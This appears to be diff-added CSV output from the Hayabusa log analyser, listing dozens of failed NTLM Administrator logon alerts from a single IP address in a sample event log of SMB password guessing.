+2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWPkeL8TnAbC1nSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JrDmUzyK4Xxx6Jn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMTf9D2yjumfS9LM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cCs65ithseTCORa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBrGAScjpAdScGmJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n90F99qBpmUUVLId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLeOkIG0hVHIOnN7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVx5uUtkaFIf7PWZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kgd7lCQUQ3dHN18S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8m2MmpFVK9Uojp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0NZjeu3lb5xddVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YjjXBZnyWt0ljzpv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
